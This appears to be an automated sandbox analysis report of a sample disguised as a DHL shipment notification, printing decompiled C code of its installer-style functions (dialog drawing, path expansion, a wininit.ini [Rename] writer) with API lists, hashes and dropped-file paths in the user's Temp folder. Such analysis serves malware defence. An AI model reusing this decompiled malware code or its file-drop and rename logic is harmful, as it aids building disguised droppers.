					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
				}
				_t76 =  *0x7a8ad8 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040473A;
				if(_t110 != 2) {
					_v8 = E00404700;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045CA(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045CA(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045FF(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x7a8ab0 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x79ff54 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x79ff54 = 0;
				return 0;
			}


















                        0x0040479b
                        0x004048c8
                        0x00404925
                        0x00404929
                        0x004049f6
                        0x004049f8
                        0x004049f8
                        0x004049fe
                        0x004049fe
                        0x00404a01
                        0x00000000
                        0x00404a08
                        0x00404937
                        0x0040493d
                        0x00404947
                        0x00404952
                        0x00404955
                        0x00404958
                        0x00404963
                        0x00404966
                        0x0040496d
                        0x0040497a
                        0x0040498b
                        0x00404991
                        0x00404993
                        0x00404999
                        0x004049a7
                        0x004049ad
                        0x004049ad
                        0x0040496d
                        0x004049b7
                        0x00000000
                        0x004049c2
                        0x004049c6
                        0x004049d6
                        0x004049d6
                        0x004049dc
                        0x004049e8
                        0x004049e8
                        0x00000000
                        0x004049ec
                        0x004049b7
                        0x004048d3
                        0x00000000
                        0x004048e5
                        0x004048ea
                        0x004048f0
                        0x00000000
                        0x00000000
                        0x00404919
                        0x0040491b
                        0x00404920
                        0x00000000
                        0x00404920
                        0x004048d3
                        0x004047a1
                        0x004047a4
                        0x004047a9
                        0x004047ba
                        0x004047ba
                        0x004047c2
                        0x004047c5
                        0x004047c9
                        0x004047cc
                        0x004047d0
                        0x004047d3
                        0x004047d6
                        0x004047d9
                        0x004047e0
                        0x004047e2
                        0x004047e2
                        0x004047ec
                        0x004047f9
                        0x00404803
                        0x00404808
                        0x0040480b
                        0x00404810
                        0x00404827
                        0x0040482e
                        0x00404841
                        0x00404844
                        0x00404858
                        0x0040485f
                        0x00404864
                        0x00404869
                        0x00404869
                        0x00404877
                        0x00404885
                        0x00404897
                        0x0040489c
                        0x004048ac
                        0x004048ae
                        0x00000000

                        APIs
                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
                        • GetDlgItem.USER32 ref: 0040483B
                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
                        • GetSysColor.USER32(?), ref: 00404869
                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
                        • lstrlenW.KERNEL32(?), ref: 0040488A
                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
                        • GetDlgItem.USER32 ref: 00404905
                        • SendMessageW.USER32(00000000), ref: 0040490C
                        • GetDlgItem.USER32 ref: 00404937
                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404988
                        • SetCursor.USER32(00000000), ref: 0040498B
                        • LoadCursorW.USER32(00000000,00007F00), ref: 004049A4
                        • SetCursor.USER32(00000000), ref: 004049A7
                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                        • String ID: @jz$N
                        • API String ID: 3103080414-4087404676
                        • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                        • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
                        • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                        • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004062B4 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004062B4(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a5628 = 0x55004e;
				 *0x7a562c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x7a5e28
					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
						_t53 = _t52 + 0x10;
						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406119(_t24 + _t46, 0x7a5228, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00406210(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040615E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                        0x004062b4
                        0x004062bd
                        0x004062c4
                        0x004062ce
                        0x004062e2
                        0x0040630a
                        0x00406311
                        0x00406315
                        0x00406319
                        0x00406339
                        0x00406340
                        0x0040634a
                        0x00406357
                        0x0040635c
                        0x00406361
                        0x00406365
                        0x00406374
                        0x00406376
                        0x00406383
                        0x00406387
                        0x00406422
                        0x00000000
                        0x0040639d
                        0x004063aa
                        0x004063ce
                        0x004063d2
                        0x004063f1
                        0x004063f5
                        0x004063f5
                        0x004063f7
                        0x00406400
                        0x0040640b
                        0x00406416
                        0x0040641c
                        0x00000000
                        0x0040641c
                        0x004063d4
                        0x004063d7
                        0x004063e2
                        0x004063de
                        0x004063e0
                        0x004063e1
                        0x004063e1
                        0x004063e9
                        0x004063eb
                        0x00000000
                        0x004063eb
                        0x004063b5
                        0x004063bb
                        0x00000000
                        0x004063bb
                        0x00406387
                        0x00406365
                        0x004062e4
                        0x004062ef
                        0x004062f8
                        0x004062fc
                        0x00000000
                        0x00000000
                        0x004062fc
                        0x0040642d

                        APIs
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040644F,?,?), ref: 004062EF
                        • GetShortPathNameW.KERNEL32 ref: 004062F8
                          • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                          • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                        • GetShortPathNameW.KERNEL32 ref: 00406315
                        • wsprintfA.USER32 ref: 00406333
                        • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
                        • GlobalFree.KERNEL32 ref: 0040641C
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406423
                          • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00406162
                          • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                        • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
                        • API String ID: 2171350718-2000197835
                        • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                        • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
                        • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                        • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8ab0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                        0x0040100a
                        0x00401039
                        0x00401047
                        0x0040104d
                        0x00401051
                        0x0040105b
                        0x00401061
                        0x00401064
                        0x004010f3
                        0x00401089
                        0x0040108c
                        0x004010a6
                        0x004010bd
                        0x004010cc
                        0x004010cf
                        0x004010d5
                        0x004010d9
                        0x004010e4
                        0x004010ed
                        0x004010ef
                        0x004010ef
                        0x00401100
                        0x00401105
                        0x0040110d
                        0x00401110
                        0x00401112
                        0x00401118
                        0x0040111f
                        0x00401126
                        0x00401130
                        0x00401142
                        0x00401156
                        0x00401160
                        0x00401165
                        0x00401165
                        0x00401110
                        0x0040116e
                        0x00000000
                        0x00401178
                        0x00401010
                        0x00401013
                        0x00401015
                        0x0040101f
                        0x0040101f
                        0x00000000

                        APIs
                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                        • BeginPaint.USER32(?,?), ref: 00401047
                        • GetClientRect.USER32 ref: 0040105B
                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                        • FillRect.USER32 ref: 004010E4
                        • DeleteObject.GDI32(?), ref: 004010ED
                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                        • SelectObject.GDI32(00000000,?), ref: 00401140
                        • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                        • DeleteObject.GDI32(?), ref: 00401165
                        • EndPaint.USER32(?,?), ref: 0040116E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                        • String ID: F
                        • API String ID: 941294808-1304234792
                        • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                        • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
                        • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                        • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004066AB Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x7a8ad8 + _t44 * 2;
				_t45 = 0x7a6a40;
				_t108 = 0x7a6a40;
				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040666E(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x7a6a40;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x7a9000;
								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
							} else {
								E004065B5(_t108,  *0x7a8aa8);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068F5(_t108);
							}
							goto L38;
						}
						if( *0x7a8b24 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x7a8aa4;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066AB(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                        0x004066ab
                        0x004066ab
                        0x004066ab
                        0x004066b1
                        0x004066b6
                        0x004066c7
                        0x004066c7
                        0x004066cf
                        0x004066d0
                        0x004066d1
                        0x004066d2
                        0x004066d5
                        0x004066dd
                        0x004066df
                        0x004066f0
                        0x004066f3
                        0x004066f3
                        0x004066f7
                        0x004066fd
                        0x00406700
                        0x004068db
                        0x004068db
                        0x004068e6
                        0x004068f2
                        0x004068f2
                        0x00000000
                        0x00406706
                        0x0040670b
                        0x00406720
                        0x00406721
                        0x00406727
                        0x004068b9
                        0x004068c7
                        0x004068ca
                        0x004068ca
                        0x004068bb
                        0x004068be
                        0x004068c1
                        0x004068c3
                        0x004068c3
                        0x004068cc
                        0x004068cc
                        0x004068d2
                        0x004068d5
                        0x00406708
                        0x00000000
                        0x00406708
                        0x00000000
                        0x004068d5
                        0x0040672d
                        0x00406730
                        0x0040673f
                        0x00406746
                        0x00406752
                        0x00406755
                        0x00406758
                        0x00406759
                        0x0040675e
                        0x00406764
                        0x00406767
                        0x0040676a
                        0x0040685d
                        0x00406862
                        0x00406895
                        0x0040689a
                        0x0040689f
                        0x004068a4
                        0x004068a4
                        0x004068a9
                        0x004068af
                        0x004068b2
                        0x00000000
                        0x004068b2
                        0x00406864
                        0x00406867
                        0x0040686a
                        0x0040687f
                        0x00406886
                        0x0040686c
                        0x00406873
                        0x00406873
                        0x0040688e
                        0x00406891
                        0x00406855
                        0x00406856
                        0x00406856
                        0x00000000
                        0x00406891
                        0x00406777
                        0x0040677b
                        0x0040677b
                        0x0040677c
                        0x0040677e
                        0x004067bb
                        0x004067be
                        0x004067ce
                        0x004067d1
                        0x004067d9
                        0x004067df
                        0x004067df
                        0x0040683a
                        0x0040683a
                        0x0040683c
                        0x00000000
                        0x00000000
                        0x004067e3
                        0x004067e8
                        0x004067e9
                        0x004067eb
                        0x00406802
                        0x00406810
                        0x00406816
                        0x00406818
                        0x00406836
                        0x00406836
                        0x00406836
                        0x00000000
                        0x00406836
                        0x0040681e
                        0x00406827
                        0x0040682a
                        0x00406830
                        0x00406834
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406834
                        0x004067fc
                        0x004067fe
                        0x00406800
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406800
                        0x00000000
                        0x0040683a
                        0x004067c6
                        0x00000000
                        0x00406780
                        0x0040679e
                        0x004067a7
                        0x00406844
                        0x00406848
                        0x00406850
                        0x00406850
                        0x00000000
                        0x00406848
                        0x004067b1
                        0x0040683e
                        0x00406842
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406842
                        0x0040677e
                        0x00000000
                        0x0040670b

                        APIs
                        • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000400), ref: 004067C6
                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Directory$SystemWindowslstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
